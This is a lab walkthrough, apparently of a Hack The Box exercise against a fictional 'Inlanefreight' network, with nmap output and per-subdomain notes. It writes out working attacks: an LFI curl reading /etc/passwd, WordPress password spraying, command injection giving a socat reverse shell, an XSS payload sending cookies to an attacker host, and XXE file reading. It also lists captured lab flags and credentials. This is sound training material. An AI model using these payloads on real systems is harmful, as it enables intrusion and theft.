Skip to content

10.129.229.147

NMAP

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              38 May 30  2022 flag.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.44
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
|   256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_  256 2ec2416646efb68195d5aa3523945538 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp   open  domain   (unknown banner: 1337_HTB_DNS)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    1337_HTB_DNS
| dns-nsid:
|_  bind.version: 1337_HTB_DNS
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Inlanefreight
110/tcp  open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP SASL AUTH-RESP-CODE RESP-CODES STLS PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_imap-capabilities: STARTTLS IDLE LOGINDISABLEDA0001 post-login IMAP4rev1 listed have more capabilities ENABLE OK ID SASL-IR Pre-login LITERAL+ LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_imap-capabilities: IDLE have post-login IMAP4rev1 capabilities listed more LITERAL+ ENABLE OK ID SASL-IR Pre-login AUTH=PLAINA0001 LOGIN-REFERRALS
995/tcp  open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP AUTH-RESP-CODE PIPELINING RESP-CODES SASL(PLAIN) USER UIDL
8080/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Support Center
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.93%I=7%D=1/10%Time=6962DF83%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,39,"\x007\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\r\x0c1337_HTB_DNS");
Service Info: Host:  ubuntu; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FootHold

FTP

  • FTP enum returned a flag - HTB{0eb0ab788df18c3115ac43b1c06ae6c4}

DNS

  • Zone transfer returned the available subdomains and a flag txt record

HTTP

inlanefreight.local monitoring.inlanefreight.local blog.inlanefreight.local careers.inlanefreight.local dev.inlanefreight.local flag.inlanefreight.local - returned a flag in the dns txt record HTB{DNs_ZOn3_Tr@nsf3r} gitlab.inlanefreight.local ir.inlanefreight.local status.inlanefreight.local support.inlanefreight.local tracking.inlanefreight.local vpn.inlanefreight.local

inlanefreight.local

  • directory Listing on /images

blog.inlanefreight.local

  • drupal website

careers.inlanefreight.local

  • register a user
  • login as that user to find profile?id=4 vulnerable to idor
  • id=4 returns HTB{8f40ecf17f681612246fa5728c159e46} flag

dev.inlanefreight.local

  • key vault site
  • ffuf with raft to find uploads.php which has TRACE enabled.
  • the response headers to TRACE return an `X
  • use that reader in the trace request to get a valid page and open the respnse in browser
  • upload a php-reverse-shell.phar file by changing the MIME type and get a reverse shell
  • find HTB{57c7f6d939eeda90aa1488b15617b9fa}
  • we are in a docker container

gitlab.inlanefreight.local

  • registered a new user to find the flag - HTB{32596e8376077c3ef8d5cf52f15279ba}
  • CVE-2022-2884
  • found shopdev2.inlanefreight.local

ir.inlanefreight.local

  • wordpress 6.0
  • ran wpscan

  • mail masta -> curl -s http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

  • Enumerating users

    • wpscan --url http://ir.inlanefreight.local --enumerate u --no-update
    • wpscan --password-attack xmlrpc -t 20 -U ilfreightwp -P /opt/SecLists/mine/password.list --url 'http://ir.inlanefreight.local/' --no-update
      • found ilfreightwp:password1
  • update the twentytwenty themes 404.php and get the flag
  • HTB{e7134abea7438e937b87608eab0d979c}
  • has interesting files

monitoring.inlanefreight.local

  • /ping.php?ip=127.0.0.1%0d%0als
  • get flag on monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0d%0aCat${IFS}00112233_flag.txt
    • HTB{bdd8a93aff53fd63a0a14de4eba4cbc1}
  • getting a reverse shell
    • /ping.php?ip=127.0.0.1%0d%0asocat${IFS}TCP:10.10.14.44:9001${IFS}EXEC:${PATH:0:1}bin${PATH:0:1}bash
    • returns shell as webdev

    • GO TO 2.md

status.inlanefreight.htb

  • has a union based sqli
  • dumped the below table for users 
    +----+-----------------------------------+----------+
| id | password                          | username |
+----+-----------------------------------+----------+
| 1  | 4528342e54d6f8f8cf15bf6e3c31bf1f6 | Admin    |
| 2  | 1fbea4df249ac4f4881a5da387eb297cf | Flag     |
+----+-----------------------------------+----------+
  • admin hash not cracked

support.inlanefreight.local

  • has a ticket.php, subscribe email field
  • on ticket.php - message field. start nc
    • "><script>document.location='http://10.10.14.44/grabber.php?c='+btoa(document.cookie)</script>
    • returns a base64 cookie on nc.
  • add the cookie in inspect element and go to the login page.
  • HTB{1nS3cuR3_c00k135}
  • login not vulnerable to sqli

shopdev2.inlanefreight.local

  • login using admin:admin
  • go to cart and try checking out. notice xxe
  • <!DOCTYPE foo [<!ENTITY xxe5ld2x SYSTEM "file:///flag.txt"> ]> to get flag HTB{dbca4dc5d99cdb3311404ea74921553c}

tracking.inlanefreight.local

  • nothing here, pdf returned
  • pdf contains the tracking number we entered
  • https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
  • HTB{49f0bad299687c62334182178bfd75d8}

vpn.inlanefreight.local

  • login page